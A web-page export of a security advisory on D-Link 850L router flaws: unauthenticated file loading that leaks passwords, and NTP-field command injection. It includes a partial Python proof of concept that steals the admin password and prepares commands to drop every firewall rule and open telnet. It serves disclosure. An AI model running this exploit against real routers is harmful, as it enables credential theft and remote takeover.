{"id":8641,"date":"2017-08-08T14:19:21","date_gmt":"2017-08-08T22:19:21","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/08\/08\/news-2414\/"},"modified":"2017-08-08T14:19:21","modified_gmt":"2017-08-08T22:19:21","slug":"news-2414","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2017\/08\/08\/news-2414\/","title":{"rendered":"SSD Advisory \u2013 D-Link 850L Multiple Vulnerabilities (Hack2Win Contest)"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz | Date: Tue, 08 Aug 2017 08:49:00 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities Summary<\/strong><br \/> The following advisory describes three (3) vulnerabilities found in the D-Link 850L router. 
<\/p>\n<p>The vulnerabilities were reported as part of the Hack2Win competition. For more information about Hack2Win, see <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3310\" target=\"_blank\">https:\/\/blogs.securiteam.com\/index.php\/archives\/3310<\/a>.<\/p>\n<p>The vulnerabilities found in D-Link 850L are:<\/p>\n<ul>\n<li>Remote Command Execution via WAN and LAN<\/li>\n<li>Remote Unauthenticated Information Disclosure via WAN and LAN<\/li>\n<li>Unauthorized Remote Code Execution as root via LAN<\/li>\n<\/ul>\n<p><strong>Credit<\/strong><br \/> The vulnerabilities were found by the following researchers while participating in Beyond Security\u2019s Hack2Win competition:<\/p>\n<ul>\n<li>Remote Command Execution via WAN and LAN: Zdenda<\/li>\n<li>Remote Unauthenticated Information Disclosure via WAN and LAN: Peter Geissler<\/li>\n<li>Unauthorized Remote Code Execution as root via LAN: Pierre Kim<\/li>\n<\/ul>\n<p><strong>Vendor response<\/strong><br \/> The vendor has released patches to address these vulnerabilities (Firmware: 1.14B07 BETA).<br \/> For more details: <a href=\"http:\/\/support.dlink.com\/ProductInfo.aspx?m=DIR-850L\" target=\"_blank\">http:\/\/support.dlink.com\/ProductInfo.aspx?m=DIR-850L<\/a><\/p>\n<p><span id=\"more-3364\"><\/span><\/p>\n<p><u><strong>Vulnerabilities details<\/strong><\/u><\/p>\n<p><strong>Remote Command Execution via WAN and LAN<\/strong><br \/> The remote command execution is a combination of 2 different vulnerabilities:<\/p>\n<ul>\n<li>Unauthenticated upload of arbitrary files<\/li>\n<li>Execution of arbitrary commands by an authenticated user with administrator privileges<\/li>\n<\/ul>\n<p>The chain of vulnerabilities ultimately allows command execution.<\/p>\n<p>When settings are changed in the admin interface, they are sent in XML format to <em>hedwig.cgi<\/em>, which loads and validates the changes. 
<\/p>\n<p>The <em>hedwig.cgi<\/em> calls <em>fatlady.php<\/em> for settings validation:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-598a38e8ac940594783654\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> [ \/htdocs\/webinc\/fatlady.php ]    
\nforeach ($prefix.&quot;\/postxml\/module&quot;)\n{\n&#8230;\n\t$service = query(&quot;service&quot;);\n&#8230;\n\t$target = &quot;\/htdocs\/phplib\/fatlady\/&quot;.$service.&quot;.php&quot;;\n&#8230;\n\tif (isfile($target)==1) dophp(&quot;load&quot;, $target);<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0014 seconds] -->  <\/p>\n<p>Then <em>pigwidgeon.cgi<\/em> is requested to apply the new settings (if valid) and restart the affected services. <\/p>\n<p><em>fatlady.php<\/em> loads service scripts to validate the input. However, the service name comes directly from the received XML and can be used to load any file with a &#8220;<em>.php<\/em>&#8221; extension.<\/p>\n<p>For example, we can use it to list user accounts with their passwords and get access to the admin interface.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-598a38e8ac950394518752\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div 
class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> \/htdocs\/webinc\/getcfg\/DEVICE.ACCOUNT.xml.php<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac950394518752-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac950394518752-1\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">htdocs<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">webinc<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">getcfg<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">DEVICE<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ACCOUNT<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">.<\/span><span 
class=\"crayon-v\">php<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0003 seconds] -->  <\/p>\n<p>After we got the Admin password, we can log in and trigger the second vulnerability &#8211; NTP server shell commands injection.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-598a38e8ac956962672763\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" 
data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> [ \/etc\/services\/DEVICE.TIME.php ]\n\n$enable = query(&quot;\/device\/time\/ntp\/enable&quot;);\nif($enable==&quot;&quot;) $enable = 0;\n$enablev6 = query(&quot;\/device\/time\/ntp6\/enable&quot;);\nif($enablev6==&quot;&quot;) $enablev6 = 0;\n$server = query(&quot;\/device\/time\/ntp\/server&quot;);\n&#8230;\nif ($enable==1 &amp;&amp; $enablev6==1)\n&#8230;\n\t\t\t'SERVER4='.$server.'\\n'.\n&#8230;\n\t\t\t'\tntpclient -h $SERVER4 -i 5 -s -4 &gt; \/dev\/console\\n'.<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac956962672763-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac956962672763-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac956962672763-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac956962672763-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac956962672763-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac956962672763-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac956962672763-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac956962672763-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac956962672763-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac956962672763-10\">10<\/div>\n<div class=\"crayon-num\" 
data-line=\"crayon-598a38e8ac956962672763-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac956962672763-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac956962672763-13\">13<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac956962672763-1\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">etc<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">services<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">DEVICE<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">TIME<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">php<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac956962672763-2\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac956962672763-3\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">163<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">enable<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">query<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;\/device\/time\/ntp\/enable&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac956962672763-4\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">164<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span 
class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">enable<\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">enable<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac956962672763-5\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">165<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">enablev6<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">query<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;\/device\/time\/ntp6\/enable&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac956962672763-6\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">166<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">enablev6<\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">enablev6<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac956962672763-7\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">167<\/span><span 
class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">server<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">query<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;\/device\/time\/ntp\/server&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac956962672763-8\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac956962672763-9\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">172<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">enable<\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">enablev6<\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac956962672763-10\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac956962672763-11\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">184<\/span><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-s\">&#8216;SERVER4=&#8217;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">$<\/span><span 
class=\"crayon-v\">server<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-s\">&#8216;n&#8217;<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac956962672763-12\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac956962672763-13\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">189<\/span><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-s\">&#8216;\tntpclient -h $SERVER4 -i 5 -s -4 &gt; \/dev\/consolen&#8217;<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0017 seconds] -->  <\/p>\n<p>As we can see, we can inject commands to NTP server with no validation. For example:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-598a38e8ac95b188547930\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line 
Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> server:\n\tsomeserver; whatever&#8230;\nresult:\n\tSERVER4=someserver\n\twhatever&#8230;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95b188547930-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95b188547930-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95b188547930-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95b188547930-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95b188547930-5\">5<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95b188547930-1\"><span class=\"crayon-v\">server<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div 
class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95b188547930-2\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">someserver<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">whatever<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95b188547930-3\"><span class=\"crayon-v\">result<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95b188547930-4\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">SERVER4<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">someserver<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95b188547930-5\"><span class=\"crayon-e\">\t<\/span><span class=\"crayon-v\">whatever<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0004 seconds] -->  <\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-598a38e8ac95e008713212\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div 
class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/usr\/bin\/env python3  # pylint: disable=C0103  #  # pip3 install requests lxml  #  import hmac  import json  import sys  from urllib.parse import urljoin  from xml.sax.saxutils import escape  import lxml.etree  import requests    try:      requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)  except:      pass    TARGET = sys.argv[1]  COMMAND = &#8220;;&#8221;.join([      &#8220;iptables -F&#8221;,      &#8220;iptables -X&#8221;,      &#8220;iptables -t nat -F&#8221;,      &#8220;iptables -t nat -X&#8221;,      &#8220;iptables -t mangle -F&#8221;,      &#8220;iptables -t mangle -X&#8221;,      &#8220;iptables -P INPUT ACCEPT&#8221;,      &#8220;iptables -P FORWARD ACCEPT&#8221;,      &#8220;iptables -P OUTPUT ACCEPT&#8221;,      &#8220;telnetd -p 23090 -l \/bin\/date&#8221;  # 
port &#8216;Z2&#8217;      ])    session = requests.Session()  session.verify = False    ############################################################    print(&#8220;Get password&#8230;&#8221;)    headers = {&#8220;Content-Type&#8221;: &#8220;text\/xml&#8221;}  cookies = {&#8220;uid&#8221;: &#8220;whatever&#8221;}  data = &#8220;&#8221;&#8221;&lt;?xml version=&#8221;1.0&#8243; encoding=&#8221;utf-8&#8243;?&gt;  &lt;postxml&gt;  &lt;module&gt;      &lt;service&gt;..\/..\/..\/htdocs\/webinc\/getcfg\/DEVICE.ACCOUNT.xml&lt;\/service&gt;  &lt;\/module&gt;  &lt;\/postxml&gt;&#8221;&#8221;&#8221;    resp = session.post(urljoin(TARGET, &#8220;\/hedwig.cgi&#8221;), headers=headers, cookies=cookies, data=data)  # print(resp.text)    # getcfg: &lt;module&gt;&#8230;&lt;\/module&gt;  # hedwig: &lt;?xml version=&#8221;1.0&#8243; encoding=&#8221;utf-8&#8243;?&gt;  #       : &lt;hedwig&gt;&#8230;&lt;\/hedwig&gt;  accdata = resp.text[:resp.text.find(&#8220;&lt;?xml&#8221;)]    admin_pasw = &#8220;&#8221;    tree = lxml.etree.fromstring(accdata)  accounts = tree.xpath(&#8220;\/module\/device\/account\/entry&#8221;)  for acc in accounts:      name = acc.findtext(&#8220;name&#8221;, &#8220;&#8221;)      pasw = acc.findtext(&#8220;password&#8221;, &#8220;&#8221;)      print(&#8220;name:&#8221;, name)      print(&#8220;pass:&#8221;, pasw)      if name == &#8220;Admin&#8221;:          admin_pasw = pasw    if not admin_pasw:      print(&#8220;Admin password not found!&#8221;)      sys.exit()    ############################################################    print(&#8220;Auth challenge&#8230;&#8221;)  resp = session.get(urljoin(TARGET, &#8220;\/authentication.cgi&#8221;))  # print(resp.text)    resp = json.loads(resp.text)  if resp[&#8220;status&#8221;].lower() != &#8220;ok&#8221;:      print(&#8220;Failed!&#8221;)      print(resp.text)      sys.exit()    print(&#8220;uid:&#8221;, resp[&#8220;uid&#8221;])  print(&#8220;challenge:&#8221;, resp[&#8220;challenge&#8221;])    
